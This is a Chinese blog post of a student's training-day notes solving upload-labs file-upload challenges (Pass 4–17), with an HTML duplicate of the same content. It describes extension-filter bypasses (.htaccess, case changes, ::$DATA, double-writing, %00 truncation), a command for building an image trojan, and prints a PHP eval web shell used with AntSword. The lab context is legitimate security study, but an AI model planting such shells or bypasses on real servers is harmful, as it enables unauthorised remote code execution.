实训第五天

博主： Xherlock
发布时间：2022 年 07 月 16 日
608 次浏览
暂无评论
3568字数
分类：实训

实训第五天

Antsword连接虚拟机

Pass 4
编写.htaccess文件

上传.htaccess文件

修改后缀

加载图片，上传成功

Pass 5
这一关吸取了上一关的教训增加了对.htaccess文件的限制

但是去掉了对大小写的限制，可以使用PHP后缀

上传成功

Pass 6
吸取了上几关的教训：既过滤了.htaccess文件，又大小写转换了后缀；但是最后没有去掉后缀后的空格，存在绕过点

上传成功

Pass 7
未对后缀末尾点号进行过滤

上传成功

Pass 8
未去除字符串::$DATA，截包后在php后加::$DATA

Pass 9
绕过空格和点

Pass 10
尝试大写PHP绕过，发现上传的文件后缀被删除

尝试双写绕过，注意php应该插入第一个p后面，即pphphp，如果插入h后：phphph，替换掉第一个遇到的php成了hph

Pass 11
url地址采用拼接方法存在绕过点
改包：将请求行中路径补充上木马文件名，并且添加%00
访问返回的shell路径，去除包含%00造成的乱码字符和后面一切字符，作为真正的shell路径
编写shell

<?php
echo "hello xherlock";
eval($_REQUEST['pass']);
?>

测试连接

Pass 12

做法同Pass 11，不同点在于这关是POST方法改变save_path地方不一样，同时post不会像get对%00进行自动解码，需要对%00进行URL解码

Pass 13

首先制作图片马：copy blank.jpg /b + shell.php /a blankshell.jpg（blank.jpg图片最好为空白）

上传图片马并查看具体文件地址：

查看include.php文件内容：

编写参数传入图片马地址和cmd参数访问phpinfo

Pass 14-15

可以直接按照上一关做

Pass16

使用老师发的gif文件木马

Pass 17

从源码来看，服务器先是将上传的文件保存下来，然后将文件的后缀名同白名单对比，如果是jpg、png、gif中的一种，就将文件进行重命名。如果不符合的话，unlink()函数就会删除该文件。

实训期间写的过于仓促，整体写的不好，下来补充upload-lab的分类学习

最后修改：2022 年 07 月 16 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

Reverse（十一）
浏览次数: 8358
Win11新机鼓捣记录
浏览次数: 2716
js逆向爬虫1
浏览次数: 1916
栈~数制转换
浏览次数: 1906
C++学习
浏览次数: 1900

mars
博主你好，请问怎么知道的alloc函数属于Buffer下的方法...
lj
该评论仅登录用户及评论双方可见
Mr.Guan
:@(赞一个)
Typecho
欢迎加入 Typecho 大家族

串~开始学习
浏览次数: 977
可恶！
浏览次数: 1067
机试day6
浏览次数: 422
应用层（四）
浏览次数: 849
Sqli-labs学习6
浏览次数: 737

实训第五天

Xherlock • 2022 年 07 月 16 日

<h1>实训第五天</h1><ol><li><strong>Antsword连接虚拟机</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/2296134782.png" alt="image-20220715095225330.png" title="image-20220715095225330.png" style=""></li></ol><p><strong>Pass 4</strong><br>   <strong>编写.htaccess文件</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/267230078.png" alt="image-20220715101844886.png" title="image-20220715101844886.png" style=""></p><p><strong>上传.htaccess文件</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/3392278918.png" alt="image-20220715102013581.png" title="image-20220715102013581.png" style=""></p><p><strong>修改后缀</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/2713811026.png" alt="image-20220715102213484.png" title="image-20220715102213484.png" style=""></p><p><strong>加载图片，上传成功</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/2001934521.png" alt="image-20220715102317944.png" title="image-20220715102317944.png" style=""></p><p><strong>Pass 5</strong><br>   <strong>这一关吸取了上一关的教训增加了对.htaccess文件的限制</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/3409989020.png" alt="image-20220715103200235.png" title="image-20220715103200235.png" style=""></p><p><strong>但是去掉了对大小写的限制，可以使用PHP后缀</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/2476148550.png" alt="image-20220715103547302.png" title="image-20220715103547302.png" style=""></p><p><strong>上传成功</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/3193594947.png" alt="image-20220715103651019.png" title="image-20220715103651019.png" style=""></p><p><strong>Pass 6</strong><br>   <strong>吸取了上几关的教训：既过滤了.htaccess文件，又大小写转换了后缀；但是最后没有去掉后缀后的空格，存在绕过点</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/3672117741.png" alt="image-20220715104139473.png" title="image-20220715104139473.png" style=""></p><p><strong>上传成功</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/3986283754.png" alt="image-20220715104256169.png" title="image-20220715104256169.png" style=""></p><p><strong>Pass 7</strong><br>   <strong>未对后缀末尾点号进行过滤</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/4121219999.png" alt="image-20220715105159972.png" title="image-20220715105159972.png" style=""></p><p><strong>上传成功</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/1404698060.png" alt="image-20220715105227685.png" title="image-20220715105227685.png" style=""></p><p><strong>Pass 8</strong><br>   未去除字符串::&dollar;DATA，截包后在php后加::$DATA<br>   <img src="http://xherlock.top/usr/uploads/2022/07/3818580523.png" alt="image-20220715110344968.png" title="image-20220715110344968.png" style=""></p><p><strong>Pass 9</strong><br>   <strong>绕过空格和点</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/2862677265.png" alt="image-20220715140744661.png" title="image-20220715140744661.png" style=""></p><p><img src="http://xherlock.top/usr/uploads/2022/07/1472045854.png" alt="image-20220715140820867.png" title="image-20220715140820867.png" style=""></p><p><strong>Pass 10</strong><br>   <strong>尝试大写PHP绕过，发现上传的文件后缀被删除</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/1601225756.png" alt="image-20220715141148581.png" title="image-20220715141148581.png" style=""></p><p><strong>尝试双写绕过，注意php应该插入第一个p后面，即pphphp，如果插入h后：phphph，替换掉第一个遇到的php成了hph</strong><br>   <img src="http://xherlock.top/usr/uploads/2022/07/994675715.png" alt="image-20220715141451565.png" title="image-20220715141451565.png" style=""></p><p><strong>Pass 11</strong><br>   <strong>url地址采用拼接方法存在绕过点</strong><br>   <strong>改包：将请求行中路径补充上木马文件名，并且添加%00</strong><br>   <strong>访问返回的shell路径，去除包含%00造成的乱码字符和后面一切字符，作为真正的shell路径</strong><br>   <strong>编写shell</strong></p><pre><code class="lang-php">&lt;?php
echo &quot;hello xherlock&quot;;
eval($_REQUEST['pass']);
?&gt;</code></pre><p><img src="http://xherlock.top/usr/uploads/2022/07/2655713811.png" alt="image-20220715144438926.png" title="image-20220715144438926.png" style=""></p><p><img src="http://xherlock.top/usr/uploads/2022/07/2507806778.png" alt="image-20220715145135927.png" title="image-20220715145135927.png" style=""></p><p><strong>测试连接</strong></p><p><img src="http://xherlock.top/usr/uploads/2022/07/2004698280.png" alt="image-20220715145720653.png" title="image-20220715145720653.png" style=""></p><p><strong>Pass 12</strong></p><p><strong>做法同Pass 11，不同点在于这关是POST方法改变save_path地方不一样，同时post不会像get对%00进行自动解码，需要对%00进行URL解码</strong></p><p><strong>Pass 13</strong></p><p><strong>首先制作图片马：copy blank.jpg /b + shell.php /a blankshell.jpg（blank.jpg图片最好为空白）</strong></p><p><img src="http://xherlock.top/usr/uploads/2022/07/2540418140.png" alt="blankshell.png" title="blankshell.png" style=""></p><p><strong>上传图片马并查看具体文件地址：</strong></p><p><img src="http://xherlock.top/usr/uploads/2022/07/3284143168.png" alt="image-20220715160532176.png" title="image-20220715160532176.png" style=""></p><p><strong>查看include.php文件内容：</strong></p><p><img src="http://xherlock.top/usr/uploads/2022/07/984362771.png" alt="includephp.png" title="includephp.png" style=""></p><p><strong>编写参数传入图片马地址和cmd参数访问phpinfo</strong></p><p><img src="http://xherlock.top/usr/uploads/2022/07/538286973.png" alt="pass13-result.png" title="pass13-result.png" style=""></p><p><strong>Pass 14-15</strong></p><p><strong>可以直接按照上一关做</strong></p><p><strong>Pass16</strong></p><p><strong>使用老师发的gif文件木马</strong></p><p><img src="http://xherlock.top/usr/uploads/2022/07/3193889161.png" alt="pass16-gif.png" title="pass16-gif.png" style=""></p><p><strong>Pass 17</strong></p><p><strong>从源码来看，服务器先是将上传的文件保存下来，然后将文件的后缀名同白名单对比，如果是jpg、png、gif中的一种，就将文件进行重命名。如果不符合的话，unlink()函数就会删除该文件。</strong></p><p>实训期间写的过于仓促，整体写的不好，下来补充upload-lab的分类学习</p>